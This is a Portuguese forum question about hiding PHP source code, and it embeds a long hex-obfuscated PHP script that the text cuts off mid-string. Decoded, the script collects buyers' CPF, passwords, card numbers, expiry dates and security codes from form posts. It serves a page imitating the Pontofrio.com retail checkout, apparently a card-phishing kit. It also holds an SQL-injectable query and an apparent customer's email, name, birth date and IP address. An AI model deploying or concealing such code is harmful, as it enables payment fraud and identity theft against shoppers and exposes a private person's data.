# Protegendo código-fonte

Tags: php

Me deparei com o seguinte código protegido. Gostaria de saber como posso esconder meu código-fonte assim também.

Não estou tendo muita sorte com `base64_decode` e preciso muito proteger o ao menos ofuscar o código-fonte do meu PHP.

```
<?php /*
${"\x47\x4c\x4fB\x41\x4cS"}["nh\x6ce\x6a\x76\x79\x70\x64k"]="a\x72quiv\x6f";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x66t\x6dc\x68\x79m\x63\x6a\x66"]="\x70\x61\x73\x74\x61";${"\x47\x4c\x4f\x42\x41L\x53"}["\x69\x6d\x76n\x76x"]="\x64\x69\x72";${"\x47LO\x42\x41L\x53"}["m\x6f\x76\x73l\x75\x64a\x69\x72\x69"]="\x64e\x6c\x65\x74\x65S\x51\x4c";${"\x47\x4cOB\x41\x4c\x53"}["n\x64\x6dp\x69i\x6b"]="\x6c\x69\x6e\x6bc\x6fm\x70\x6c\x65t\x6fn1";${"\x47L\x4f\x42\x41L\x53"}["a\x70c\x61\x66\x69\x76\x75w"]="\x6c\x69n\x6bco\x6dp\x6ceto\x31";${"GLO\x42\x41LS"}["jj\x62\x74p\x75\x6d\x71l"]="l\x69\x6ek\x63om\x70leto\x6e";${"G\x4cO\x42\x41\x4c\x53"}["\x6f\x6c\x68t\x76\x67\x76\x6b\x63\x65\x66"]="\x70r\x6fd\x75\x74o";${"\x47\x4cOB\x41\x4c\x53"}["\x65\x6ds\x77\x6a\x71"]="\x6c\x69\x6e\x6b\x63o\x6dp\x6cet\x6f";${"GL\x4fB\x41LS"}["\x76g\x64\x78\x77\x6b"]="\x75\x72l\x45nd\x65\x72e\x63\x6f";$bhypbkeojm="\x64\x69\x72";$xrfxcjru="\x70r\x6f\x64\x75\x74o";${"\x47\x4c\x4f\x42A\x4c\x53"}["khdx\x64k\x75\x79\x62"]="c";${"\x47L\x4f\x42A\x4cS"}["\x77\x67\x75\x6ck\x68"]="\x73";${"\x47\x4c\x4fBAL\x53"}["\x78\x6a\x67\x63\x6ao\x66i\x70\x6c"]="me\x6es\x61\x67\x65\x6d";${"\x47\x4cO\x42\x41\x4c\x53"}["\x68\x70\x64k\x75\x70\x77\x74x\x73\x69"]="\x68\x65\x61\x64e\x72\x73";${"\x47\x4cO\x42\x41\x4cS"}["\x73\x70\x6f\x6d\x6d\x66\x6eye\x78"]="\x45\x73\x74\x61d\x6f";${"\x47\x4cOB\x41L\x53"}["\x65\x75\x63\x63\x64\x61b\x6b\x71\x68"]="\x4eum\x65r\x6f";${"\x47LOB\x41\x4c\x53"}["\x63\x6e\x75\x69\x6c\x6for\x61\x73\x70"]="\x52ua";${"\x47L\x4fBA\x4cS"}["t\x67\x72\x65m\x71\x67\x6bkt"]="\x44\x65st\x69\x6e\x61\x74\x61ri\x6f";${"G\x4cOB\x41\x4c\x53"}["skrn\x69z\x62k"]="\x70\x72e\x63\x6f\x6e\x6f\x76\x6f\x69";${"GLOB\x41LS"}["\x6ci\x6a\x6dx\x6d\x71"]="\x6e\x75m\x65\x72o\x70\x65d\x69d\x6f";$qqkqugp="\x4d\x75\x6ei\x63\x69p\x69o";${"\x47\x4cOB\x41L\x53"}["\x69sm\x76d\x71\x6as\x68\x73"]="\x63\x68\x61\x74";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x70\x6a\x73\x6f\x63\x69\x66\x72\x64\x75"]="\x72\x6f\x77\x5ffu\x6e\x63\x6fes";${"\x47\x4cOB\x41L\x53"}["\x6b\x64m\x6f\x68\x71u"]="\x66u\x6e\x63\x6f\x65s";${"\x47LO\x42A\x4c\x53"}["\x70k\x66\x6f\x78j"]="\x71ue\x72\x79\x5ff\x75\x6ec\x6f\x65s";${"\x47LO\x42\x41LS"}["bm\x65\x64mp\x78\x70\x76"]="\x70\x72\x6f\x64\x75\x74\x6fn\x6f\x6de";${"\x47\x4c\x4f\x42AL\x53"}["\x6d\x6d\x62\x75\x72\x66\x69"]="n\x75m\x65\x72\x6f\x5f\x63\x63";${"\x47L\x4f\x42A\x4c\x53"}["\x62\x76\x6ecl\x79\x66"]="\x4e\x72\x53\x65\x67\x75\x72a\x6e\x63a";${"G\x4c\x4f\x42\x41L\x53"}["\x63\x71ub\x63\x68\x6b"]="\x44\x74\x56\x61\x6ci\x64\x61\x64\x65A\x6eo";${"G\x4c\x4f\x42\x41\x4cS"}["\x61\x65\x64\x6d\x73\x71\x77"]="DtV\x61\x6c\x69\x64a\x64e\x4d\x65\x73";${"\x47L\x4fB\x41\x4c\x53"}["\x73\x65\x71\x6c\x69\x70\x70\x68"]="\x4e\x72C\x61\x72t\x61\x6f";${"G\x4cO\x42\x41\x4c\x53"}["\x6f\x63kyj\x79a"]="M\x75n\x69c\x69\x70\x69\x6f";${"\x47L\x4f\x42A\x4c\x53"}["d\x61\x6c\x78\x6avo\x63j\x78"]="\x43ep";${"\x47\x4c\x4f\x42A\x4cS"}["\x64\x7avh\x79\x79m\x6aim\x66"]="\x4e\x6fm\x65\x45";${"\x47\x4cO\x42A\x4cS"}["h\x75\x72\x69\x6asvz"]="T\x69\x70o\x45n\x64e\x72\x65c\x6f";${"\x47\x4c\x4fBA\x4cS"}["\x6b\x6b\x62\x7a\x75\x64s"]="\x64\x61\x74\x61nas\x63\x69\x6d\x65\x6eto";$ahtmbwui="\x65\x6d\x61\x69\x6c";${"\x47LOBA\x4c\x53"}["\x72ot\x75\x72\x6cej"]="t\x69\x70o\x66o\x6e\x651";$adghebe="\x52\x75a";$hhmgykep="\x4e\x75m\x65ro";${"\x47\x4c\x4fBA\x4cS"}["q\x78\x68\x6e\x72\x6d\x7a\x6b\x65"]="\x63\x70\x66";$xtbckofsaeu="E\x73\x74\x61\x64\x6f";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["l\x79h\x73y\x75j\x6f\x79\x69"]="\x4eom\x65\x63\x6f\x6dp\x72a";${"\x47\x4c\x4f\x42\x41LS"}["\x65\x66g\x73\x63t\x75\x7a\x66ed\x70"]="pr\x65c\x6f\x73\x65\x6d";${"\x47LO\x42\x41\x4c\x53"}["\x68fu\x7ao\x6bt\x78\x79a"]="p\x72\x65co\x6e\x6fvo\x64\x73";${"\x47L\x4fB\x41\x4c\x53"}["k\x77\x77\x72\x71\x6b\x77\x72\x62pdt"]="\x70\x72\x65c\x6f\x70\x61r\x63e\x6c\x61";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x68qdv\x72\x6f\x79\x72\x6e\x66"]="\x72\x6fw_\x53\x65\x74\x61\x50\x72\x6f\x64u\x74os";$xljxqvay="pr\x65\x63\x6f\x6e\x6fvo\x69";$prvtnmqtru="\x72\x6f\x77\x5f\x53\x65t\x61\x50\x72\x6fd\x75t\x6fs";${"G\x4c\x4f\x42A\x4c\x53"}["\x69\x76\x68\x66\x69\x6d\x79w\x62"]="\x71u\x65\x72\x79\x5f\x53\x65\x74aP\x72\x6f\x64u\x74os";${"\x47\x4c\x4fB\x41\x4cS"}["\x6b\x70\x6f\x6aw\x65\x6bt\x7avn"]="\x53\x65\x74a\x50r\x6f\x64\x75t\x6f\x73";$pkkdowfbrnc="I\x64\x46\x6f\x72ma\x50\x61\x67\x61me\x6etoP\x61\x72\x63\x65\x6ca\x6d\x65\x6et\x6f";${"GL\x4fBALS"}["\x64\x6aq\x77\x6e\x70\x68"]="\x73exo";${"GLO\x42A\x4cS"}["\x6f\x71h\x77\x79u\x79\x6c\x62"]="d\x61\x74\x61b\x61\x73\x65_Co\x6e\x6eect\x44B";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x76\x79\x77nyj\x74"]="\x43o\x6en\x65\x63t\x44\x42";$uquazcxyhsix="\x42\x61\x69\x72\x72o";${"GLOB\x41\x4c\x53"}["\x70\x68\x6ej\x69\x67\x63h\x72\x68\x6a"]="\x63\x68at";${"G\x4c\x4f\x42\x41\x4c\x53"}["ko\x6bbv\x79u\x72\x75"]="\x71\x75\x65\x72y\x5f\x53etaP\x72o\x64u\x74\x6f\x73";$mbexhgtr="SetaP\x72\x6fdu\x74\x6f\x73";${"GLOBA\x4c\x53"}["\x71\x78\x62\x66qjr\x64i\x69\x6e"]="\x70\x72e\x63\x6f\x62";$lbckqypxwtb="ro\x77\x5fS\x65\x74a\x50\x72o\x64\x75\x74o\x73";${"GL\x4f\x42\x41L\x53"}["\x7a\x74c\x76\x68\x6f\x79\x75sp"]="\x69\x64";${"G\x4c\x4f\x42\x41L\x53"}["ml\x65\x75\x68\x75m\x6f"]="p\x72\x65\x63\x6fno\x76od";$fdxrpgchzngr="ti\x70\x6ffone2";$heermvnpz="t\x6f\x74\x61\x6c\x52\x6fw\x73\x5f\x53\x65\x74a\x50\x72\x6fd\x75\x74o\x73";require_once("../\x43onn\x65c\x74i\x6fn\x73/\x43\x6fnnectD\x42.p\x68p");$bfywqke="r\x6f\x77\x5f\x53e\x74\x61\x50rod\x75\x74\x6fs";$fuxicw="\x70\x72ec\x6f\x6e\x6fvo\x66";${${"\x47LO\x42ALS"}["\x7a\x74\x63vh\x6f\x79u\x73p"]}=$_POST["\x69\x64"];${"\x47L\x4f\x42\x41LS"}["kxo\x63\x6b\x69rd\x64"]="\x50\x6fn\x74o\x52\x65\x66\x65r\x65\x6e\x63i\x61";${"\x47\x4cO\x42\x41\x4c\x53"}["\x6b\x64g\x66\x73\x6c\x63\x62"]="\x70re\x63\x6f\x73\x65\x6d";mysqli_select_db(${${"\x47\x4c\x4fB\x41\x4c\x53"}["v\x79\x77\x6ey\x6a\x74"]},${${"\x47L\x4f\x42\x41LS"}["\x6f\x71\x68\x77\x79\x75\x79\x6cb"]});${${"\x47\x4cO\x42\x41L\x53"}["\x6bo\x6bb\x76y\x75\x72u"]}="SE\x4cE\x43\x54\x20* F\x52\x4fM \x70r\x6fd\x75t\x6f\x20W\x48\x45R\x45 i\x64\x20= \x27$id'";${"\x47\x4cO\x42\x41\x4c\x53"}["tda\x75\x79j"]="preco\x6eo\x76\x6f\x69";${${"\x47\x4cOB\x41\x4cS"}["\x6b\x70\x6f\x6a\x77\x65\x6b\x74\x7a\x76\x6e"]}=mysqli_query(${${"\x47\x4cO\x42\x41L\x53"}["\x76yw\x6e\x79j\x74"]},${${"GLOBA\x4cS"}["\x69\x76h\x66i\x6d\x79\x77b"]})or die(mysqli_error());${$bfywqke}=mysqli_fetch_assoc(${${"\x47L\x4fBA\x4c\x53"}["k\x70\x6f\x6a\x77\x65\x6b\x74\x7av\x6e"]});${"G\x4cO\x42\x41LS"}["\x6c\x61f\x69\x73\x77"]="\x70\x72e\x63o\x62";$kqdnrvhf="\x72\x6fw_\x53\x65\x74\x61P\x72od\x75tos";${$heermvnpz}=mysqli_num_rows(${$mbexhgtr});$byufbxcefuvb="\x74\x65\x6cefon\x65\x31";${$xljxqvay}=${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x68\x71\x64v\x72\x6f\x79\x72\x6ef"]}["n\x6fv\x6f\x70r\x65\x63o"];${$fuxicw}=substr(${${"G\x4c\x4fB\x41\x4c\x53"}["\x74\x64au\x79j"]},0,-3);$wfebqfvdfh="\x70\x72\x65\x63o\x6e\x6f\x76\x6f\x64\x73";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x71\x78bf\x71\x6a\x72d\x69i\x6e"]}=${$prvtnmqtru}["\x70\x72e\x63o\x62r\x75t\x6f"];$uogpyirm="s\x65\x6eh\x61";${${"G\x4cO\x42\x41\x4c\x53"}["\x6dleu\x68\x75\x6d\x6f"]}=str_replace(strtoupper("\x2e"),"",strtoupper(${${"\x47L\x4fBA\x4c\x53"}["\x6c\x61\x66\x69\x73\x77"]}/10));${${"\x47LO\x42\x41\x4cS"}["h\x66\x75\x7aok\x74x\x79\x61"]}=${$lbckqypxwtb}["\x6e\x6f\x76\x6f\x70\x72\x65\x63\x6f"];${${"\x47L\x4fBA\x4c\x53"}["e\x66\x67\x73\x63t\x75\x7afe\x64\x70"]}=substr(${$wfebqfvdfh},0,-3);$bbhfzjr="\x74el\x65fo\x6e\x65\x32";$zjpsjg="pr\x6fd\x75t\x6f\x6e\x6fm\x65";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x67n\x67\x70\x76\x75\x65\x6b\x75\x62\x79"]="\x64\x65let\x65\x53Q\x4c";${${"GL\x4f\x42AL\x53"}["k\x77\x77\x72\x71\x6b\x77\x72\x62pdt"]}=str_replace(".","",${${"\x47LOB\x41\x4cS"}["k\x64\x67f\x73\x6c\x63\x62"]});${${"\x47L\x4f\x42\x41\x4c\x53"}["lyh\x73\x79\x75\x6a\x6f\x79i"]}=$_POST["Nom\x65\x63\x6f\x6d\x70r\x61"];${${"\x47\x4cOB\x41LS"}["\x71\x78hnrmz\x6b\x65"]}=$_POST["cpf"];${${"\x47\x4c\x4f\x42\x41L\x53"}["\x72\x6f\x74\x75\x72\x6cej"]}=$_POST["\x74i\x70o\x66o\x6e\x651"];${"\x47\x4c\x4fB\x41L\x53"}["b\x72w\x74\x64ge"]="\x44\x65\x73\x74\x69\x6e\x61\x74\x61r\x69o";${$byufbxcefuvb}=$_POST["\x74el\x65fone\x31"];${$fdxrpgchzngr}=$_POST["\x74ipofo\x6ee2"];${$bbhfzjr}=$_POST["t\x65l\x65\x66on\x65\x32"];$pjobgndqiqfm="t\x6ft\x61\x6c\x52\x6fw\x73\x5f\x66\x75\x6e\x63o\x65s";${${"\x47\x4cOB\x41\x4c\x53"}["k\x6bb\x7a\x75d\x73"]}=$_POST["data\x6e\x61\x73ciment\x6f"];${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6c\x71\x64\x69\x71\x78e\x61\x62\x71"]="\x42ai\x72r\x6f";${"\x47\x4cOBA\x4cS"}["ow\x66d\x6b\x63\x79"]="\x43o\x6d\x70\x6ce\x6d\x65n\x74\x6f";${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x64j\x71\x77\x6ep\x68"]}=$_POST["s\x65\x78\x6f"];${$ahtmbwui}=$_POST["e\x6d\x61\x69\x6c"];${$uogpyirm}=$_POST["s\x65nha"];${${"\x47\x4c\x4f\x42AL\x53"}["\x68\x75r\x69\x6a\x73\x76\x7a"]}=$_POST["T\x69\x70\x6f\x45\x6eder\x65co"];${${"\x47\x4c\x4f\x42A\x4c\x53"}["d\x7av\x68\x79\x79\x6dj\x69\x6d\x66"]}=$_POST["N\x6fm\x65E"];${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x62\x72w\x74\x64\x67\x65"]}=$_POST["D\x65s\x74in\x61\x74a\x72\x69o"];${${"\x47\x4c\x4fBAL\x53"}["d\x61lx\x6av\x6fc\x6a\x78"]}=$_POST["\x43\x65p"];${$adghebe}=$_POST["R\x75a"];${$hhmgykep}=$_POST["\x4e\x75\x6der\x6f"];${${"GL\x4f\x42A\x4c\x53"}["\x6fwf\x64k\x63\x79"]}=$_POST["C\x6fmp\x6c\x65m\x65n\x74o"];${${"\x47\x4cO\x42A\x4cS"}["\x6c\x71\x64\x69\x71\x78e\x61\x62\x71"]}=$_POST["Ba\x69\x72\x72o"];${${"\x47L\x4f\x42ALS"}["ocky\x6aya"]}=$_POST["Mun\x69c\x69\x70\x69\x6f"];$pipggarius="r\x6f\x77_\x66u\x6e\x63\x6f\x65\x73";$aqvnuuishth="\x75r\x6c\x53\x65\x72\x76\x65r";${$xtbckofsaeu}=$_POST["\x45stado"];${${"\x47\x4cO\x42\x41LS"}["k\x78\x6f\x63k\x69\x72\x64d"]}=$_POST["\x50\x6fn\x74\x6fR\x65fe\x72e\x6ec\x69a"];${${"GL\x4fB\x41L\x53"}["\x73\x65q\x6c\x69pp\x68"]}=$_POST["\x4erCart\x61o"];${"G\x4c\x4f\x42\x41L\x53"}["r\x68\x79\x69ac\x70e\x75\x70\x78x"]="\x6cinkc\x6f\x6d\x70\x6cet\x6f1";$utkwcuoveu="\x4e\x6fmeT";${"GL\x4fBA\x4c\x53"}["\x64wx\x66\x6ay\x6f\x62ri"]="num\x65\x72\x6f\x70\x65dido";${${"\x47\x4cO\x42A\x4cS"}["a\x65d\x6ds\x71\x77"]}=$_POST["\x44t\x56al\x69d\x61\x64e\x4de\x73"];$hfcvnu="\x4e\x6f\x6d\x65\x63om\x70r\x61";${${"\x47\x4cOB\x41\x4c\x53"}["\x63\x71u\x62c\x68\x6b"]}=$_POST["\x44tVa\x6cida\x64eAno"];$xibmumfkhxj="\x64at\x61\x62\x61s\x65\x5f\x43o\x6e\x6e\x65\x63\x74D\x42";${$utkwcuoveu}=$_POST["\x4eo\x6d\x65\x54"];${${"\x47LO\x42\x41LS"}["b\x76\x6e\x63\x6c\x79f"]}=$_POST["\x4e\x72S\x65\x67\x75\x72a\x6eca"];${$pkkdowfbrnc}=$_POST["\x49dFo\x72\x6d\x61\x50\x61\x67\x61\x6d\x65\x6et\x6f\x50a\x72\x63\x65l\x61m\x65\x6eto"];${"\x47L\x4fB\x41L\x53"}["w\x65\x6d\x65td"]="\x75r\x6cS\x65r\x76\x65\x72";${${"G\x4c\x4f\x42\x41\x4c\x53"}["m\x6dbu\x72\x66\x69"]}=${${"\x47\x4c\x4f\x42ALS"}["\x73\x65q\x6c\x69\x70ph"]};${${"\x47LO\x42AL\x53"}["\x62\x6de\x64\x6d\x70\x78p\x76"]}=${${"\x47\x4cOB\x41\x4c\x53"}["h\x71\x64\x76r\x6fyr\x6ef"]}["no\x6d\x65\x70ro\x64uto"];${${"G\x4cO\x42\x41\x4c\x53"}["\x64w\x78\x66\x6a\x79\x6fbr\x69"]}=rand(20000,99999);echo "<!DOC\x54\x59P\x45\x20\x68\x74m\x6c\x3e\n\x3chtm\x6c\x20la\x6e\x67=\x22\x65n\"\x3e\n    \x3c\x68ea\x64\x3e\n\x20\x20  \x20\x20\x20\x20\x3c\x6d\x65ta\x20\x63h\x61rse\x74\x3d\"utf-\x38\x22>\n\x20  \x20\x20\x20\x20\x20\x3c\x6d\x65ta htt\x70-\x65\x71uiv\x3d\x22\x70ra\x67\x6d\x61\" c\x6fntent=\x22n\x6f-c\x61c\x68e\"\x3e\n\x20\x20\x20  \x20  \x3c\x6deta h\x74\x74p-eq\x75\x69\x76=\x22\x58-UA-\x43om\x70at\x69b\x6c\x65\" co\x6et\x65nt\x3d\x22\x49\x45\x3dEdge,chr\x6f\x6d\x65\x3d1\x22\x3e\n\x20\x20 \x20<ti\x74l\x65\x3e\n\x20\x20 \x20\x20\x20\x20 Pontof\x72io\x2ecom: \x61\x20maio\x72 \x6co\x6a\x61 d\x65 E\x6c\x65t\x72ô\x6ei\x63o\x73 e E\x6cet\x72o\x64\x6f\x6dé\x73ticos\x20\x64\x6f\x20Br\x61\x73il\n\x20 \x20\x20 \x20  \n\x20  \x20</\x74i\x74\x6ce\x3e\n \x20\x20   \x20 \x3c\x6c\x69nk\x20r\x65\x6c\x3d\"sh\x6fr\x74c\x75t icon\x22\x20\x68r\x65\x66\x3d\x22\x68\x74tps://carr\x69\x6e\x68o.\x70o\x6e\x74\x6ffr\x69\x6f.\x63om.br/A\x70p\x5fThem\x65\x73/P\x6fn\x74oF\x72\x69\x6f/fav\x69\x63\x6f\x6e\x2eico\"\x20/\x3e\n\x20\x20\x20 <\x6c\x69n\x6b\x20\x68\x72ef=\x22\x68ttp://carri\x6e\x68\x6f.p\x6fnt\x6f\x66r\x69\x6f.com\x2e\x62r/\x43\x6fn\x74en\x74/\x63\x73\x73/jq\x75e\x72\x79-ui-1\x2e\x31\x30.3.cu\x73to\x6d\x2ecss\"\x20\x72e\x6c=\"\x73tyle\x73hee\x74\x22/>\n<\x6cink\x20\x68ref\x3d\x22\x68\x74\x74p://c\x61r\x72\x69nh\x6f.po\x6e\x74ofr\x69\x6f.\x63o\x6d\x2e\x62\x72/Cont\x65\x6et/\x50ont\x6f\x46rio/\x63\x73s/\x63\x68e\x63k\x6f\x75t\x2ec\x73s\"\x20re\x6c\x3d\x22s\x74\x79\x6cesh\x65et\x22/\x3e\n<l\x69\x6ek\x20\x68\x72\x65f\x3d\x22\x68\x74tp://c\x61r\x72inho.pon\x74o\x66\x72\x69\x6f.\x63o\x6d.\x62r/Co\x6e\x74\x65\x6et/c\x73\x73/t\x68\x69c\x6b\x62ox/thic\x6bb\x6f\x78\x2e\x63ss\x22\x20\x72\x65l=\x22s\x74y\x6ce\x73\x68e\x65\x74\"/>\n\n\x20  \x20\x20\x20  \x3c\x6d\x65t\x61\x20na\x6d\x65\x3d\"\x76\x69e\x77port\"\x20\x63o\x6e\x74e\x6et\x3d\"wid\x74h\x3d\x64e\x76\x69\x63\x65-w\x69d\x74\x68\x22\x3e\n \x20 \x20    \x3c\x6deta\x20nam\x65\x3d\x22\x6dsa\x70p\x6cic\x61t\x69o\x6e-config\" \x63o\x6ete\x6et=\"\x6e\x6fne\"\x3e\n\x20\n    \x20 \x20 \n  \x20 \x20 \x20\x20<\x6deta\x20n\x61me\x3d\"ro\x62\x6f\x74\x73\x22\x20\x63\x6fnt\x65n\x74\x3d\x22\x4eO\x49\x4e\x44\x45X, \x46\x4f\x4c\x4c\x4f\x57\"\x20/\x3e\n  \x20\x20\x20\x20\x20 \n\x3cs\x63r\x69\x70\x74\x20t\x79p\x65=\"te\x78t/j\x61vas\x63\x72\x69\x70\x74\x22\x3e\n\x76\x61\x72\x20s\x69\x74\x65M\x65tad\x61\x74\x61\x20= {\x22s\x69te\x22:{\"n\x61me\":\x22\x50ont\x6fF\x72\x69o\x22,\"doma\x69n\":\"p\x6fnto\x66ri\x6f\x2ecom.b\x72\x22,\"ac\x72\x6fnym\":\x22\x50\x46\x22,\x22\x63ou\x6et\x72\x79\x22:\x22\x42\x52\x22,\x22\x72\x65gio\x6e\":\x22p\x74-\x62\x72\x22,\"c\x75r\x72\x65n\x63\x79\":\x22BRL\",\x22\x74e\x73t\":\x66alse},\x22page\x22:{\x22\x6e\x61m\x65\x22:\"Fin\x61l\x69za\x43o\x6d\x70ra\",\"\x74\x65m\x70l\x61\x74eN\x61\x6d\x65\":\"\x46\x49N\x41\x4c\x49\x5aA\x43O\x4dPR\x41\x22,\"has\x42\x72\x65\x61d\x43r\x75mb\x22:false,\"\x63h\x61or\x64i\x63Pac\x6b\":\x22rDB\x74W\x70\x31R\x38\x59\x63\x69heg\x43dRWU2\x42\x25\x32\x42Qm\x431%\x32\x42m3\x4b\x4cx\x51x\x4bV\x7a\x757\x58K\x66\x4er\x69i\x4d\x38\x6fa\x37\x37UIc\x59\x36YM\x45\x61\x76n0zq\x79\x36P\x6b1\x57\x78\x52g\x6e\x48\x6b\x75\x77\x4d\x56\x30f\x67\x252\x425\x61eqd2\x33z\x4c\x36\x38\x42lIL\x38\x35\x37\x62A\x64\x6e\x76\x35\x4b\x72U1Ck%2\x46qz\x4e\x61\x30CH\x70\x50\x69lE%2\x461KSy\x25\x32\x428\x30\x59\x6cWK\x46\x5387\x30\x64t\x77\x52Ep\x43\x42sF\x43iJ\x67\x69Yh\x54h\x34Y9\x37\x53KJn\x43bv\x4bb\x49yG5\x31\x51utUf7\x57\x45\x51\x74\x68gD\x4e5\x4bq\x58a\x53\x732\x4fn%2\x46\x252F\x4f\x57ni\x70\x70\x64k\x4bM\x61YJ\x44F94Y1\x6f\x35\x33\x6a\x6fdR\x64\x62\x324\x6d\x6d\x50\x46\x41\x30\x4d\x75\x70\x427W%2\x46o\x70P\x7698\x4eAj\x5avA\x57eT\x36KcU%2\x42%\x32\x42rla\x33\x71aE\x57LU\x252BWfy\x50\x7aiB\x69y\x42WGY\x32\x6c\x35\x4a\x36r\x75Z\x252FG\x57\x6c\x77i\x5arB1\x4aT\x7arn2\x50n\x58\x53\x36\x71oc\x39\x61L\x76GNNsK\x35\x57\x78\x72\x32\x4d\x6eM2QA\x252F\x48\x57\x4aVJ\x25\x32FEUAn\x35\x252\x46\x34AqW\x35\x50\x54r\x34S8\x5816\x72\x51\x75N\x6f\x633\",\"\x62anners\x22:{\x22\x69\x63\x69d\x22:[]},\x22\x68otSites\x22:{\"ic\x69d\":[]},\"\x73\x65oC\x6f\x6e\x74\x65\x6et\":f\x61l\x73e,\"\x61\x6db\x69ent\x65\x49\x64\":\x30},\x22se\x73\x73ion\":{\"\x75\x73er\":{\x22\x69d\x55\x73\x65\x72\x22:\x2211\x33\x313\x3274\",\"em\x61i\x6c\x22:\"\x62or\x67es\x7a\x69n\x68\x6f\x312\x40\x68\x6ft\x6d\x61\x69\x6c.\x63\x6f\x6d,bor\x67esz\x69\x6eho1\x32\x40\x68\x6ftmail.\x63\x6f\x6d\",\"a\x67e\":\"2\x35%\x32C\",\"\x67\x65nde\x72\x22:\x22M%2\x43M\",\"\x70\x6fst\x61\x6cCo\x64\x65\x22:\"7589\x300\x300\",\x22c\x69ty\":\"\x53%C3\x25A3o\x25\x320\x53\x69\x6d\x25\x433%\x41\x33o\",\"\x73tat\x65\":\x22GO\",\x22cou\x6etry\":\x22\x42\x72a\x73\x69\x6c\x22,\x22l\x6fg\x69nSour\x63e\":\x22S\x69te\x25\x32CS\x69te\x22,\x22\x6e\x61sci\x6den\x74o\x22:\x22\x31\x399\x30-1\x30-\x310\x25\x32\x30\x30\x30\x25\x33A\x30\x30\x25\x33\x41\x300Z%\x32C19\x39\x30-\x31\x30-\x31\x30%2\x3000\x25\x33A00\x253\x410\x30Z\",\x22t\x69\x70o\x22:\"PF\x25\x32CP\x46\",\"sign\x75\x70\":\x74r\x75\x65,\x22\x66\x69\x72stN\x61\x6d\x65\x22:\"Lucas%2\x43\x4c\x75\x63\x61s\x22,\"las\x74N\x61me\x22:\x22B\x6frge\x73\x25\x32\x43B\x6f\x72\x67\x65s\"},\x22ip\x22:\"1\x377\x2e10\x36.\x31\x375.\x31\x34\x35\"},\x22\x63he\x63\x6b\x6fu\x74\":{\"s\x74ep\":\"\x70\x75\x72\x63h\x61se\",\x22\x69\x74em\x73\":[{\x22\x70\x72\x6f\x64uct\x22:{\"\x69d\x53k\x75\x22:\x22\x327\x317791\",\"i\x64P\x72\x6f\x64\x75c\x74\":\"757\x34\x39\x37\",\x22\x69\x64\x44\x65\x70\x61\x72t\x6den\x74\x22:\x22\x31\",\x22i\x64\x43\x61\x74\x65gory\":\x2237\x30\x22,\"\x69dB\x72\x61\x6ed\x22:\"459\x22,\x22nam\x65B\x72an\x64\":\x22Sam\x73\x75\x6eg\",\x22\x6e\x61me\":\x22\x54V\x2520LED\x25\x32\x303\x32\x25E2%\x38\x30%9D%2\x30H\x44%20\x53\x61\x6d\x73u\x6e\x67%\x320\x332FH\x34\x32\x30\x35\x252\x30c\x6f\x6d\x25\x32\x30\x43\x6fn\x76\x65rs\x6fr%2\x30\x44i\x67i\x74\x61\x6c\x25\x32C\x2520F\x75n%C3%\x417%\x433\x25\x413\x6f%\x320\x46u\x74eb\x6fl%\x32C\x2520C\x6fnnectSha\x72e\x25\x320\x4d\x6f\x76\x69e\x252C\x252\x30E\x6etradas\x25\x320\x48D\x4d\x49%\x32\x30\x65\x25\x32\x30U\x53\x42\",\x22f\x75\x6clN\x61m\x65\x22:\"\x54V\x25\x32\x30\x4c\x45\x44%2032\x25E\x32%80%9\x44\x25\x320H\x44\x25\x320Sa\x6ds\x75ng\x25\x32\x3032FH\x34205%20\x63om\x252\x30Co\x6ev\x65rso\x72\x25\x320Di\x67\x69t\x61l\x252C%\x320Fun%C\x33%\x417\x25\x43\x33%A\x33\x6f%\x320F\x75t\x65\x62o\x6c\x25\x32C%\x320Co\x6e\x6e\x65c\x74\x53\x68\x61\x72e\x2520M\x6fvi\x65%\x32\x43\x252\x30Ent\x72\x61da\x73%20\x48\x44MI\x25\x32\x30\x65\x25\x320\x55\x53B\",\x22ba\x73\x65\x50r\x69ce\":\x39\x365.\x39\x30,\x22\x73\x61l\x65\x50\x72i\x63e\x22:1\x323\x39\x2e0\x30,\x22\x61ttri\x62u\x74\x65\x73\":[],\x22d\x69sc\x6funt\x50e\x72cen\x74\x61\x67e\x22:-28\x2e27,\x22se\x6c\x6cer\x22:{\x22\x6e\x61m\x65\x22:\"P\x46- \x53Ã\x4f MATEUS\",\"\x69d\x22:\x31\x3265\x32,\x22pr\x69\x63e\":\x31\x32\x339.\x30\x30},\x22\x69\x64\x4dod\x65\x6c\":\"\x55\x4e32F\x48\x342\x30\x35\x47XZ\x44\x22,\"\x53\x74\x6fc\x6b\x41v\x61\x69l\x61bi\x6c\x69\x74y\x22:f\x61ls\x65,\x22\x66\x6cag\x43\x61\x72t\x61o\x22:0,\x22\x69\x6e\x63o\x6d\x65\":0\x2e\x30,\"\x48\x61\x73Rev\x69e\x77\x22:\x66a\x6c\x73e,\"\x51t\x64\x52\x65vi\x65\x77\x22:\x30,\x22\x52\x61\x74i\x6eg\x52\x65\x76\x69\x65\x77\":\x30\x2e\x30},\"qu\x61\x6e\x74\x69\x74\x79\x22:\x31,\x22\x69\x74em\x54o\x74\x61\x6c\x50r\x69ce\":\x312\x33\x39.00,\"\x65\x78\x74\x65n\x64\x65\x64W\x61r\x72\x61\x6e\x74\x79\":f\x61ls\x65,\"e\x78\x74\x65nd\x65\x64\x50\x6c\x61\x6e\x22:\x30}],\"p\x72od\x75ctsT\x6ft\x61\x6c\":\x31\x323\x39.00,\x22shippi\x6e\x67\x50r\x69\x63\x65\x22:5\x35\x2e3\x34,\x22g\x72\x61\x6ed\x54ot\x61\x6c\":\x3129\x34\x2e\x33\x34,\"\x71\x75\x61\x6et\x69ty\x54o\x74al\":\x31,\"i\x64\x4fr\x64er\":\x2273\x323\x36\x33\x357\",\x22i\x6et\x65r\x65\x73\x74R\x61\x74e\x22:\x30\x2e00,\x22ship\x70\x69n\x67\x4d\x61\x78D\x61ys\x22:\x31\x33\x2e\x30,\"\x73hipp\x69n\x67\x54ype\":\"No\x72\x6dal\",\x22pay\x6d\x65\x6e\x74M\x65t\